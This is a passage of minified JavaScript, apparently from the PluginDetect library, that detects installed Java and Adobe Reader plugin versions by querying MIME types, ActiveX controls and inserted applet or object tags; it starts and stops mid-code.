codebase="#version=';b=e.classID||e.$$.classID||"";e.tagB='" '+((/clsid\s*:/i).test(b)?'classid="':'type="')+b+'">'+e.altHTML+d.openTag+"/object>";for(a=0;a<e.Lower.length;a++){e.Lower[a]=d.formatNum(e.Lower[a]);e.Upper[a]=d.formatNum(e.Upper[a])}}},isActiveXObject:function(i,b){var f=this,g=f.$,a=0,h,d=i.$$,c=i.span;if(i.min&&g.compareNums(b,i.min)<=0){return 1}if(i.max&&g.compareNums(b,i.max)>=0){return 0}c.innerHTML=i.tagA+b+i.tagB;if(g.getPROP(c.firstChild,"object")){a=1};f.checkGarbage(c);c.innerHTML="";if(a){i.min=b}else{i.max=b}return a},convert_:function(f,a,b,e){var d=f.convert[a],c=f.$;return d?(c.isFunc(d)?c.formatNum(d(b.split(c.splitNumRegx),e).join(",")):b):d},convert:function(h,c,g){var e=this,f=h.$,b,a,d;c=f.formatNum(c);a={v:c,x:-1};if(c){for(b=0;b<h.Lower.length;b++){d=e.convert_(h,b,h.Lower[b]);if(d&&f.compareNums(c,g?d:h.Lower[b])>=0&&(!b||f.compareNums(c,g?e.convert_(h,b,h.Upper[b]):h.Upper[b])<0)){a.v=e.convert_(h,b,c,g);a.x=b;break}}}return a},isMin:function(g,f){var d=this,e=g.$,c,b,a=0;d.init(g);return a},search:function(g){var k=this,h=k.$,i=g.$$,b=0,c;k.init(g);c=(g.hasRun||k.isDisabled())?1:0;g.hasRun=1;if(c){return g.version};var o,n,m,j=function(q,t){var r=[].concat(f),s;r[q]=t;s=k.isActiveXObject(g,r.join(","));if(s){b=1;f[q]=t}else{p[q]=t}return s},d=g.DIGITMAX,e,a,l=99999999,f=[0,0,0,0],p=[0,0,0,0];for(o=0;o<p.length;o++){f[o]=Math.floor(g.DIGITMIN[o])||0;e=f.join(",");a=f.slice(0,o).concat([l,l,l,l]).slice(0,f.length).join(",");for(m=0;m<d.length;m++){if(h.isArray(d[m])){d[m].push(0);if(d[m][o]>p[o]&&h.compareNums(a,g.Lower[m])>=0&&h.compareNums(e,g.Upper[m])<0){p[o]=Math.floor(d[m][o])}}}for(n=0;n<30;n++){if(p[o]-f[o]<=16){for(m=p[o];m>=f[o]+(o?1:0);m--){if(j(o,m)){break}}break}j(o,Math.round((p[o]+f[o])/2))}if(!b){break}p[o]=f[o]}if(b){g.version=k.convert(g,f.join(",")).v};return g.version}},win:{$:1,loaded:false,hasRun:0,init:function(){var b=this,a=b.$;if(!b.hasRun){b.hasRun=1;b.addEvent("load",a.ev.handler(b.runFuncs,a));b.addEvent("unload",a.ev.handler(b.cleanup,a))}},addEvent:function(c,b){var e=this,d=e.$,a=window;if(d.isFunc(b)){if(a.addEventListener){a.addEventListener(c,b,false)}else{if(a.attachEvent){a.attachEvent("on"+c,b)}else{a["on"+c]=e.concatFn(b,a["on"+c])}}}},concatFn:function(d,c){return function(){d();if(typeof c=="function"){c()}}},funcs0:[],funcs:[],cleanup:function(b){if(b){for(var a in b){b[a]=0}b=0}},runFuncs:function(a){if(a&&!a.win.loaded){a.win.loaded=true;a.ev.callArray(a.win.funcs0);a.ev.callArray(a.win.funcs);if(a.DOM){a.DOM.onDoneEmptyDiv()}}},z:0},DOM:{$:1,isEnabled:{$:1,objectTag:function(){var a=this.$;return a.isIE?a.ActiveXEnabled:1},objectProperty:function(){var a=this.$;return a.isIE&&a.verIE>=7?1:0}},div:null,divID:"plugindetect",divClass:"doNotRemove",divWidth:50,getDiv:function(){var a=this;return a.div||document.getElementById(a.divID)||null},isDivPermanent:function(){var b=this,c=b.$,a=b.getDiv();return a&&c.isString(a.className)&&a.className.toLowerCase().indexOf(b.divClass.toLowerCase())>-1?1:0},initDiv:function(b){var c=this,d=c.$,a;if(!c.div){a=c.getDiv();if(a){c.div=a}else{if(b){c.div=document.createElement("div");c.div.id=c.divID}}if(c.div){c.setStyle(c.div,c.defaultStyle.concat(["display","block","width",c.divWidth+"px","height",(c.pluginSize+3)+"px","fontSize",(c.pluginSize+3)+"px","lineHeight",(c.pluginSize+3)+"px"]));if(!a){c.setStyle(c.div,["position","absolute","right","0px","top","0px"]);c.insertDivInBody(c.div)}}}},pluginSize:1,altHTML:" ",emptyNode:function(c){var b=this,d=b.$,a,f;if(c&&c.childNodes){for(a=c.childNodes.length-1;a>=0;a--){if(d.isIE){b.setStyle(c.childNodes[a],["display","none"])}c.removeChild(c.childNodes[a])}}},LASTfuncs:[],onDoneEmptyDiv:function(){var f=this,g=f.$,b,d,c,a,h;f.initDiv();if(!g.win.loaded||g.win.funcs0.length||g.win.funcs.length){return}for(b in g.Plugins){d=g.Plugins[b];if(d){if(d.OTF==3||(d.funcs&&d.funcs.length)){return}}}g.ev.callArray(f.LASTfuncs);a=f.getDiv();if(a){if(f.isDivPermanent()){}else{if(a.childNodes){for(b=a.childNodes.length-1;b>=0;b--){c=a.childNodes[b];f.emptyNode(c)}try{a.innerHTML=""}catch(h){}}if(a.parentNode){try{a.parentNode.removeChild(a)}catch(h){}a=null;f.div=null}}}},width:function(){var g=this,e=g.DOM,f=e.$,d=g.span,b,c,a=-1;b=d&&f.isNum(d.scrollWidth)?d.scrollWidth:a;c=d&&f.isNum(d.offsetWidth)?d.offsetWidth:a;return c>0?c:(b>0?b:Math.max(c,b))},obj:function(b){var d=this,c=d.span,a=c&&c.firstChild?c.firstChild:null;return a},readyState:function(){var b=this,a=b.DOM.$;return a.isIE?a.getPROP(b.obj(),"readyState"):b.undefined},objectProperty:function(){var d=this,b=d.DOM,c=b.$,a;if(b.isEnabled.objectProperty()){a=c.getPROP(d.obj(),"object")}return a},getTagStatus:function(b,m,r,p,f,h){var s=this,d=s.$,q;if(!b||!b.span){return -2}var k=b.width(),c=b.readyState(),a=b.objectProperty();if(a){return 1.5}var g=/clsid\s*\:/i,o=r&&g.test(r.outerHTML||"")?r:(p&&g.test(p.outerHTML||"")?p:0),i=r&&!g.test(r.outerHTML||"")?r:(p&&!g.test(p.outerHTML||"")?p:0),l=b&&g.test(b.outerHTML||"")?o:i;if(!m||!m.span||!l||!l.span){return 0}var j=l.width(),n=m.width(),t=l.readyState();if(k<0||j<0||n<=s.pluginSize){return 0}if(h&&!b.pi&&d.isDefined(a)&&d.isIE&&b.tagName==l.tagName&&b.time<=l.time&&k===j&&c===0&&t!==0){b.pi=1}if(j<n){return b.pi?-0.1:0}if(k>=n){if(!b.winLoaded&&d.win.loaded){return b.pi?-0.5:-1}if(d.isNum(f)){if(!d.isNum(b.count2)){b.count2=f}if(f-b.count2>0){return b.pi?-0.5:-1}}}try{if(k==s.pluginSize&&(!d.isIE||c===4)){if(!b.winLoaded&&d.win.loaded){return 1}if(b.winLoaded&&d.isNum(f)){if(!d.isNum(b.count)){b.count=f}if(f-b.count>=5){return 1}}}}catch(q){}return b.pi?-0.1:0},setStyle:function(b,h){var c=this,d=c.$,g=b.style,a,f;if(g&&h){for(a=0;a<h.length;a=a+2){try{g[h[a]]=h[a+1]}catch(f){}}}},insertDivInBody:function(a,h){var j=this,d=j.$,g,b="pd33993399",c=null,i=h?window.top.document:window.document,f=i.getElementsByTagName("body")[0]||i.body;if(!f){try{i.write('<div id="'+b+'">.'+d.openTag+"/div>");c=i.getElementById(b)}catch(g){}}f=i.getElementsByTagName("body")[0]||i.body;if(f){f.insertBefore(a,f.firstChild);if(c){f.removeChild(c)}}},defaultStyle:["verticalAlign","baseline","outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"],insert:function(b,i,g,h,c,q,o){var s=this,f=s.$,r,t=document,v,m,p=t.createElement("span"),k,a,l="outline-style:none;border-style:none;padding:0px;margin:0px;visibility:"+(q?"hidden;":"visible;")+"display:inline;";if(!f.isDefined(h)){h=""}if(f.isString(b)&&(/[^\s]/).test(b)){b=b.toLowerCase().replace(/\s/g,"");v=f.openTag+b+" ";v+='style="'+l+'" ';var j=1,u=1;for(k=0;k<i.length;k=k+2){if(/[^\s]/.test(i[k+1])){v+=i[k]+'="'+i[k+1]+'" '}if((/width/i).test(i[k])){j=0}if((/height/i).test(i[k])){u=0}}v+=(j?'width="'+s.pluginSize+'" ':"")+(u?'height="'+s.pluginSize+'" ':"");v+=">";for(k=0;k<g.length;k=k+2){if(/[^\s]/.test(g[k+1])){v+=f.openTag+'param name="'+g[k]+'" value="'+g[k+1]+'" />'}}v+=h+f.openTag+"/"+b+">"}else{b="";v=h}if(!o){s.initDiv(1)}var n=o||s.getDiv();m={span:null,winLoaded:f.win.loaded,tagName:b,outerHTML:v,DOM:s,time:new Date().getTime(),width:s.width,obj:s.obj,readyState:s.readyState,objectProperty:s.objectProperty};if(n&&n.parentNode){s.setStyle(p,s.defaultStyle.concat(["display","inline"]).concat(o?[]:["fontSize",(s.pluginSize+3)+"px","lineHeight",(s.pluginSize+3)+"px"]));n.appendChild(p);try{p.innerHTML=v}catch(r){};m.span=p;m.winLoaded=f.win.loaded}return m}},file:{$:1,any:"fileStorageAny999",valid:"fileStorageValid999",save:function(d,f,c){var b=this,e=b.$,a;if(d&&e.isDefined(c)){if(!d[b.any]){d[b.any]=[]}if(!d[b.valid]){d[b.valid]=[]}d[b.any].push(c);a=b.split(f,c);if(a){d[b.valid].push(a)}}},getValidLength:function(a){return a&&a[this.valid]?a[this.valid].length:0},getAnyLength:function(a){return a&&a[this.any]?a[this.any].length:0},getValid:function(c,a){var b=this;return c&&c[b.valid]?b.get(c[b.valid],a):null},getAny:function(c,a){var b=this;return c&&c[b.any]?b.get(c[b.any],a):null},get:function(d,a){var c=d.length-1,b=this.$.isNum(a)?a:c;return(b<0||b>c)?null:d[b]},split:function(g,c){var b=this,e=b.$,f=null,a,d;g=g?g.replace(".","\\."):"";d=new RegExp("^(.*[^\\/])("+g+"\\s*)$");if(e.isString(c)&&d.test(c)){a=(RegExp.$1).split("/");f={name:a[a.length-1],ext:RegExp.$2,full:c};a[a.length-1]="";f.path=a.join("/")}return f},z:0},Plugins:{java:{$:1,mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],mimeType_dummy:"application/dummymimejavaapplet",classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",classID_dummy:"clsid:8AD9C840-044E-11D1-B3E9-BA9876543210",navigator:{$:1,a:(function(){var b,a=!0;try{a=window.navigator.javaEnabled()}catch(b){}return a})(),javaEnabled:function(){return this.a},mimeObj:0,pluginObj:0},OTF:null,getVerifyTagsDefault:function(){return[1,this.applet.isDisabled.VerifyTagsDefault_1()?0:1,1]},getVersion:function(j,g,i){var b=this,d=b.$,e,a=b.applet,h=b.verify,k=b.navigator,f=null,l=null,c=null;if(b.getVersionDone===null){b.OTF=0;k.mimeObj=d.hasMimeType(b.mimeType);if(k.mimeObj){k.pluginObj=k.mimeObj.enabledPlugin}if(h){h.begin()}}a.setVerifyTagsArray(i);d.file.save(b,".jar",g);if(b.getVersionDone===0){if(a.should_Insert_Query_Any()){e=a.insert_Query_Any(j);b.setPluginStatus(e[0],e[1],f,j)}return}if((!f||d.dbug)&&b.navMime.query().version){f=b.navMime.version}if((!f||d.dbug)&&b.DTK.query(d.dbug).version){f=b.DTK.version}if((!f||d.dbug)&&b.navPlugin.query().version){f=b.navPlugin.version}if(b.nonAppletDetectionOk(f)){c=f}b.setPluginStatus(c,l,f,j);if(a.should_Insert_Query_Any()){e=a.insert_Query_Any(j);if(e[0]){c=e[0];l=e[1]}}b.setPluginStatus(c,l,f,j)},nonAppletDetectionOk:function(b){var d=this,e=d.$,a=d.navigator,c=1;if(!b||!a.javaEnabled()||(!e.isIE&&!a.mimeObj)||(e.isIE&&!e.ActiveXEnabled)){c=0}else{if(e.OS>=20){}else{if(d.info&&d.info.getPlugin2Status()<0&&d.info.BrowserRequiresPlugin2()){c=0}}}return c},setPluginStatus:function(d,i,g,h){var b=this,e=b.$,f,c=0,a=b.applet;g=g||b.version0;f=a.isRange(d);if(f){if(a.setRange(f,h)==d){c=f}d=0}if(b.OTF<3){b.installed=c?(c>0?0.7:-0.1):(d?1:(g?-0.2:-1))}if(b.OTF==2&&b.NOTF&&!b.applet.getResult()[0]){b.installed=g?-0.2:-1}if(b.OTF==3&&b.installed!=-0.5&&b.installed!=0.5){b.installed=(b.NOTF.isJavaActive(1)==1?0.5:-0.5)}if(b.OTF==4&&(b.installed==-0.5||b.installed==0.5)){if(d){b.installed=1}else{if(c){b.installed=c>0?0.7:-0.1}else{if(b.NOTF.isJavaActive(1)==1){if(g){b.installed=1;d=g}else{b.installed=0}}else{if(g){b.installed=-0.2}else{b.installed=-1}}}}}if(g){b.version0=e.formatNum(e.getNum(g))}if(d&&!c){b.version=e.formatNum(e.getNum(d))}if(i&&e.isString(i)){b.vendor=i}if(!b.vendor){b.vendor=""}if(b.verify&&b.verify.isEnabled()){b.getVersionDone=0}else{if(b.getVersionDone!=1){if(b.OTF<2){b.getVersionDone=0}else{b.getVersionDone=b.applet.can_Insert_Query_Any()?0:1}}};e.codebase.emptyGarbage()},DTK:{$:1,hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],isDisabled:function(a){var b=this,c=b.$;if(!a&&(!c.DOM.isEnabled.objectTag()||(c.isIE&&c.verIE<6)||(c.isGecko&&c.compareNums(c.verGecko,c.formatNum("1.6"))<=0)||(c.isSafari&&c.OS==1&&(!c.verSafari||c.compareNums(c.verSafari,"5,1,0,0")<0))||c.isChrome)){return 1}return 0},query:function(n){var l=this,h=l.$,f=l.$$,k,m,i,a=h.DOM.altHTML,g={},b,d=null,j=null,c=(l.hasRun||l.isDisabled(n));l.hasRun=1;if(c){return l}l.status=0;if(h.isIE){for(m=0;m<l.classID.length;m++){l.HTML=h.DOM.insert("object",["classid",l.classID[m]],[],a);d=l.HTML.obj();if(h.getPROP(d,"jvms")){break}}}else{i=h.hasMimeType(l.mimeType);if(i&&i.type){l.HTML=h.DOM.insert("object",["type",i.type],[],a);d=l.HTML.obj()}}if(d){try{b=h.getPROP(d,"jvms");if(b){j=b.getLength();if(h.isNum(j)){l.status=j>0?1:-1;for(m=0;m<j;m++){i=h.getNum(b.get(j-1-m).version);if(i){l.VERSIONS.push(i);g["a"+h.formatNum(i)]=1}}}}}catch(k){}}i=0;for(m in g){i++}if(i&&i!==l.VERSIONS.length){l.VERSIONS=[]}if(l.VERSIONS.length){l.version=h.formatNum(l.VERSIONS[0])};return l}},navMime:{$:1,hasRun:0,mimetype:"",version:"",length:0,mimeObj:0,pluginObj:0,isDisabled:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;if(d.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},query:function(){var i=this,f=i.$,a=i.$$,b=(i.hasRun||i.isDisabled());i.hasRun=1;if(b){return i};var n=/^\s*application\/x-java-applet;jpi-version\s*=\s*(\d.*)$/i,g,l,j,d="",h="a",o,m,k={},c=f.formatNum("0");for(l=0;l<navigator.mimeTypes.length;l++){o=navigator.mimeTypes[l];m=o?o.enabledPlugin:0;g=o&&n.test(o.type||d)?f.formatNum(f.getNum(RegExp.$1)):0;if(g&&m&&(m.description||m.name)){if(!k[h+g]){i.length++}k[h+g]=o.type;if(f.compareNums(g,c)>0){c=g}}}g=k[h+c];if(g){o=f.hasMimeType(g);i.mimeObj=o;i.pluginObj=o?o.enabledPlugin:0;i.mimetype=g;i.version=c};return i}},navPlugin:{$:1,hasRun:0,version:"",isDisabled:function(){var d=this,c=d.$,b=d.$$,a=b.navigator;if(c.isIE||!a.mimeObj||!a.pluginObj){return 1}return 0},query:function(){var m=this,e=m.$,c=m.$$,h=c.navigator,j,l,k,g,d,a,i,f=0,b=(m.hasRun||m.isDisabled());m.hasRun=1;if(b){return m};a=h.pluginObj.name||"";i=h.pluginObj.description||"";if(!f||e.dbug){g=/Java.*TM.*Platform[^\d]*(\d+)(?:[\.,_](\d*))?(?:\s*[Update]+\s*(\d*))?/i;if((g.test(a)||g.test(i))&&parseInt(RegExp.$1,10)>=5){f="1,"+RegExp.$1+","+(RegExp.$2?RegExp.$2:"0")+","+(RegExp.$3?RegExp.$3:"0")}}if(!f||e.dbug){g=/Java[^\d]*Plug-in/i;l=g.test(i)?e.formatNum(e.getNum(i)):0;k=g.test(a)?e.formatNum(e.getNum(a)):0;if(l&&(e.compareNums(l,e.formatNum("1,3"))<0||e.compareNums(l,e.formatNum("2"))>=0)){l=0}if(k&&(e.compareNums(k,e.formatNum("1,3"))<0||e.compareNums(k,e.formatNum("2"))>=0)){k=0}d=l&&k?(e.compareNums(l,k)>0?l:k):(l||k);if(d){f=d}}if(!f&&e.isSafari&&e.OS==2){j=e.findNavPlugin("Java.*\\d.*Plug-in.*Cocoa",0);if(j){l=e.getNum(j.description);if(l){f=l}}};if(f){m.version=e.formatNum(f)};return m}},applet:{$:1,codebase:{$:1,isMin:function(a){return this.$.codebase.isMin(this,a)},search:function(){return this.$.codebase.search(this)},ParamTags:'<param name="code" value="A19999.class" /><param name="codebase_lookup" value="false" />',DIGITMAX:[[16,64],[6,0,512],0,[1,5,2,256],0,[1,4,1,1],[1,4,0,64],[1,3,2,32]],DIGITMIN:[1,0,0,0],Upper:["999","10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4"],Lower:["10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4","0"],convert:[function(b,a){return a?[parseInt(b[0],10)>1?"99":parseInt(b[1],10)+3+"",b[3],"0","0"]:["1",parseInt(b[0],10)-3+"","0",b[1]]},function(b,a){return a?[b[1],b[2],b[3]+"0","0"]:["1",b[0],b[1],b[2].substring(0,b[2].length-1||1)]},0,function(b,a){return a?[b[0],b[1],b[2],b[3]+"0"]:[b[0],b[1],b[2],b[3].substring(0,b[3].length-1||1)]},0,1,function(b,a){return a?[b[0],b[1],b[2],b[3]+"0"]:[b[0],b[1],b[2],b[3].substring(0,b[3].length-1||1)]},1]},results:[[null,null],[null,null],[null,null],[null,null]],getResult:function(){var b=this,d=b.results,a,c=[];for(a=d.length-1;a>=0;a--){c=d[a];if(c[0]){break}}c=[].concat(c);return c},DummySpanTagHTML:0,HTML:[0,0,0,0],active:[0,0,0,0],DummyObjTagHTML:0,DummyObjTagHTML2:0,allowed:[1,1,1,1],VerifyTagsHas:function(c){var d=this,b;for(b=0;b<d.allowed.length;b++){if(d.allowed[b]===c){return 1}}return 0},saveAsVerifyTagsArray:function(c){var b=this,d=b.$,a;if(d.isArray(c)){for(a=1;a<b.allowed.length;a++){if(c.length>a-1&&d.isNum(c[a-1])){if(c[a-1]<0){c[a-1]=0}if(c[a-1]>3){c[a-1]=3}b.allowed[a]=c[a-1]}}b.allowed[0]=b.allowed[3]}},setVerifyTagsArray:function(d){var b=this,c=b.$,a=b.$$;if(a.getVersionDone===null){b.saveAsVerifyTagsArray(a.getVerifyTagsDefault())}if(c.dbug){b.saveAsVerifyTagsArray([3,3,3])}else{if(d){b.saveAsVerifyTagsArray(d)}}},isDisabled:{$:1,single:function(d){var a=this,c=a.$,b=a.$$;if(d==0){return c.codebase.isDisabled()}if((d==3&&!c.isIE)||a.all()){return 1}if(d==1||d==3){return !c.DOM.isEnabled.objectTag()}if(d==2){return a.AppletTag()}},aA_:null,all:function(){var c=this,e=c.$,d=c.$$,b=d.navigator,a=0;if(c.aA_===null){if(e.OS>=20){a=0}else{if(e.verOpera&&e.verOpera<11&&!b.javaEnabled()){a=1}else{if((e.verGecko&&e.compareNums(e.verGecko,e.formatNum("2"))<0)&&!b.mimeObj){a=1}else{if(c.AppletTag()&&!e.DOM.isEnabled.objectTag()){a=1}}}};c.aA_=a}return c.aA_},AppletTag:function(){var b=this,d=b.$,c=b.$$,a=c.navigator;return d.isIE?!a.javaEnabled():0},VerifyTagsDefault_1:function(){var a=this.$;if(a.OS>=20){return 1}if((a.isIE&&(a.verIE<9||!a.ActiveXEnabled))||(a.verGecko&&a.compareNums(a.verGecko,a.formatNum("2"))<0)||(a.isSafari&&(!a.verSafari||a.compareNums(a.verSafari,a.formatNum("4"))<0))||(a.verOpera&&a.verOpera<10)){return 0}return 1},z:0},can_Insert_Query:function(d){var b=this,c=b.results[0][0],a=b.getResult()[0];if(b.HTML[d]||(d==0&&c!==null&&!b.isRange(c))||(d==0&&a&&!b.isRange(a))){return 0}return !b.isDisabled.single(d)},can_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.results.length;a++){if(b.can_Insert_Query(a)){return 1}}return 0},should_Insert_Query:function(e){var c=this,f=c.allowed,d=c.$,b=c.$$,a=c.getResult()[0];a=a&&(e>0||!c.isRange(a));if(!c.can_Insert_Query(e)||f[e]===0){return 0}if(f[e]==3||(f[e]==2.8&&!a)){return 1}if(!b.nonAppletDetectionOk(b.version0)){if(f[e]==2||(f[e]==1&&!a)){return 1}}return 0},should_Insert_Query_Any:function(){var b=this,a;for(a=0;a<b.allowed.length;a++){if(b.should_Insert_Query(a)){return 1}}return 0},query:function(f){var j,a=this,i=a.$,d=a.$$,k=null,l=null,b=a.results,c,h,g=a.HTML[f];if(!g||!g.obj()||b[f][0]||d.bridgeDisabled||(i.dbug&&d.OTF<3)){return}c=g.obj();h=g.readyState();if(!i.isIE||h===4){try{k=i.getNum(c.getVersion()+"");l=c.getVendor()+"";c.statusbar(i.win.loaded?" ":" ")}catch(j){};if(k&&i.isStrNum(k)){b[f]=[k,l];a.active[f]=2}}},isRange:function(a){return(/^[<>]/).test(a||"")?(a.charAt(0)==">"?1:-1):0},setRange:function(b,a){return(b?(b>0?">":"<"):"")+(this.$.isString(a)?a:"")},insertJavaTag:function(g,n,h,o,m){var e=this,c=e.$,k=e.$$,r="A.class",b=c.file.getValid(k),f=b.name+b.ext,q=b.path;var i=["archive",f,"code",r],l=(o?["width",o]:[]).concat(m?["height",m]:[]),j=["mayscript","true"],p=["scriptable","true","codebase_lookup","false"].concat(j),a=k.navigator,d=!c.isIE&&a.mimeObj&&a.mimeObj.type?a.mimeObj.type:k.mimeType[0];if(g==1){return c.isIE?c.DOM.insert("object",["type",d].concat(l),["codebase",q].concat(i).concat(p),h,k,0,n):c.DOM.insert("object",["type",d].concat(l),["codebase",q].concat(i).concat(p),h,k,0,n)}if(g==2){return c.isIE?c.DOM.insert("applet",["alt",h].concat(j).concat(i).concat(l),["codebase",q].concat(p),h,k,0,n):c.DOM.insert("applet",["codebase",q,"alt",h].concat(j).concat(i).concat(l),[].concat(p),h,k,0,n)}if(g==3){return c.isIE?c.DOM.insert("object",["classid",k.classID].concat(l),["codebase",q].concat(i).concat(p),h,k,0,n):c.DOM.insert()}if(g==4){return c.DOM.insert("embed",["codebase",q].concat(i).concat(["type",d]).concat(p).concat(l),[],h,k,0,n)}},insert_Query_Any:function(i){var b=this,d=b.$,c=b.$$,g=b.results,j=b.HTML,a=d.DOM.altHTML,e,h=d.file.getValid(c);if(b.should_Insert_Query(0)){if(c.OTF<2){c.OTF=2};g[0]=[0,0];e=i?b.codebase.isMin(i):b.codebase.search();if(e){g[0][0]=i?b.setRange(e,i):e}b.active[0]=e?1.5:-1}if(!h){return b.getResult()}if(!b.DummySpanTagHTML){b.DummySpanTagHTML=d.DOM.insert("",[],[],a)}if(b.should_Insert_Query(1)){if(c.OTF<2){c.OTF=2};j[1]=b.insertJavaTag(1,0,a);g[1]=[0,0];b.query(1)}if(b.should_Insert_Query(2)){if(c.OTF<2){c.OTF=2};j[2]=b.insertJavaTag(2,0,a);g[2]=[0,0];b.query(2)}if(b.should_Insert_Query(3)){if(c.OTF<2){c.OTF=2};j[3]=b.insertJavaTag(3,0,a);g[3]=[0,0];b.query(3)}if(d.DOM.isEnabled.objectTag()){if(!b.DummyObjTagHTML&&(j[1]||j[2])){b.DummyObjTagHTML=d.DOM.insert("object",["type",c.mimeType_dummy],[],a)}if(!b.DummyObjTagHTML2&&j[3]){b.DummyObjTagHTML2=d.DOM.insert("object",["classid",c.classID_dummy],[],a)}}var f=c.NOTF;if(c.OTF<3&&f.shouldContinueQuery()){c.OTF=3;f.onIntervalQuery=d.ev.handler(f.$$onIntervalQuery,f);if(!d.win.loaded){d.win.funcs0.push([f.winOnLoadQuery,f])}setTimeout(f.onIntervalQuery,f.intervalLength)}return b.getResult()}},NOTF:{$:1,count:0,countMax:25,intervalLength:250,shouldContinueQuery:function(){var f=this,e=f.$,c=f.$$,b=c.applet,a,d=0;if(e.win.loaded&&f.count>f.countMax){return 0}for(a=0;a<b.results.length;a++){if(b.HTML[a]){if(!e.win.loaded&&f.count>f.countMax&&e.codebase.checkGarbage(b.HTML[a].span)){d=1;b.HTML[a].DELETE=1}if(!d&&!b.results[a][0]&&(b.allowed[a]>=2||(b.allowed[a]==1&&!b.getResult()[0]))&&f.isAppletActive(a)>=0){return 1}}};return 0},isJavaActive:function(d){var f=this,c=f.$$,a,b,e=-9;for(a=0;a<c.applet.HTML.length;a++){b=f.isAppletActive(a,d);if(b>e){e=b}}return e},isAppletActive:function(e,g){var h=this,f=h.$,b=h.$$,l=b.navigator,a=b.applet,i=a.HTML[e],d=a.active,k,c=0,j,m=d[e];if(g||m>=1.5||!i||!i.span){return m};j=f.DOM.getTagStatus(i,a.DummySpanTagHTML,a.DummyObjTagHTML,a.DummyObjTagHTML2,h.count);for(k=0;k<d.length;k++){if(d[k]>0){c=1}}if(j!=1){m=j}else{if(f.isIE||(b.version0&&l.javaEnabled()&&l.mimeObj&&(i.tagName=="object"||c))){m=1}else{m=0}}d[e]=m;return m},winOnLoadQuery:function(c,d){var b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();d.queryCompleted(a)}},$$onIntervalQuery:function(d){var c=d.$,b=d.$$,a;if(b.OTF==3){a=d.queryAllApplets();if(!d.shouldContinueQuery()){d.queryCompleted(a)}}d.count++;if(b.OTF==3){setTimeout(d.onIntervalQuery,d.intervalLength)}},queryAllApplets:function(){var f=this,e=f.$,d=f.$$,c=d.applet,b,a;for(b=0;b<c.results.length;b++){c.query(b)}a=c.getResult();return a},queryCompleted:function(c){var g=this,f=g.$,e=g.$$,d=e.applet,b;if(e.OTF>=4){return}e.OTF=4;var a=g.isJavaActive();for(b=0;b<d.HTML.length;b++){if(d.HTML[b]&&d.HTML[b].DELETE){f.DOM.emptyNode(d.HTML[b].span);d.HTML[b].span=null}}e.setPluginStatus(c[0],c[1],0);if(f.onDetectionDone&&e.funcs){f.ev.callArray(e.funcs)}if(f.DOM){f.DOM.onDoneEmptyDiv()}}},zz:0},adobereader:{$:1,setPluginStatus:function(){var d=this,b=d.$,a=d.navPlugin.detected,e=d.navPlugin.version,g=d.axo.detected,c=d.axo.version,i=d.doc.detected,h=d.doc.version,f=e||c||h||null;d.installed=f?1:(a>0||g>0||i>0?0:(i==-0.5?-0.15:(b.isIE&&(!b.ActiveXEnabled||b.ActiveXFilteringEnabled)?-1.5:-1)));d.version=b.formatNum(f)},getVersion:function(c,e){var a=this,d=a.$,b=0;if((!b||d.dbug)&&a.navPlugin.query().detected>0){b=1}if((!b||d.dbug)&&a.axo.query().detected>0){b=1}if((!b||d.dbug)&&(a.doc.query().detected>0||a.doc.detected==-0.5)){b=1}a.setPluginStatus()},navPlugin:{$:1,detected:0,version:null,mimeType:"application/pdf",isDisabled:function(){var c=this,b=c.$,a=c.$$;return b.isIE||c.detected||!b.hasMimeType(c.mimeType)?1:0},attempt3:function(){var c=this,b=c.$,a=null;if(b.OS==1){if(b.hasMimeType("application/vnd.adobe.pdfxml")){a="9"}else{if(b.hasMimeType("application/vnd.adobe.x-mars")){a="8"}else{if(b.hasMimeType("application/vnd.adobe.xfdf")){a="6"}}}}return a},query:function(){var d=this,c=d.$,a=d.$$,f,e,b=null;if(d.isDisabled()){return d};f="Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";e=c.findNavPlugin(f,0);d.detected=e?1:-1;if(e){b=c.getNum(e.description)||c.getNum(e.name);b=c.getPluginFileVersion(e,b);if(!b){b=d.attempt3()}}if(b){d.version=b};return d}},pluginQuery:function(j){var f=this,d=f.$,b="",h=null,g,a,i,c;try{if(j){b=j.GetVersions()}}catch(g){}if(b&&d.isString(b)){a=/=\s*([\d\.]+)/g;for(i=0;i<30;i++){if(a.test(b)){c=d.formatNum(RegExp.$1);if(!h||d.compareNums(c>h)>0){h=c}}else{break}}}return h},axo:{$:1,detected:0,version:null,progID:["AcroPDF.PDF","AcroPDF.PDF.1","PDF.PdfCtrl","PDF.PdfCtrl.5","PDF.PdfCtrl.1"],isDisabled:function(){var b=this,c=b.$,a=b.$$;return c.isIE&&!b.detected?0:1},query:function(){var d=this,e=d.$,b=d.$$,f=0,c=null,a;if(d.isDisabled()){return d};for(a=0;a<d.progID.length;a++){f=e.getAXO(d.progID[a]);if(f){d.detected=1;c=b.pluginQuery(f);if(!e.dbug&&c){break}}}d.version=c?c:null;if(d.detected===0){d.detected=-1};return d}},doc:{$:1,detected:0,version:null,classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",classID_dummy:"clsid:CA8A9780-280D-11CF-A24D-BA9876543210",DummySpanTagHTML:0,HTML:0,DummyObjTagHTML1:0,DummyObjTagHTML2:0,isDisabled:function(){var c=this,b=c.$,a=0;if(c.detected){a=1}else{if(b.dbug){}else{if(!b.isIE||!b.DOM.isEnabled.objectTag()){a=1}}}return a},query:function(){var i=this,d=i.$,f=i.$$,h=null,a=d.DOM.altHTML,g=null,c=1,e=1,b;if(i.isDisabled()){return 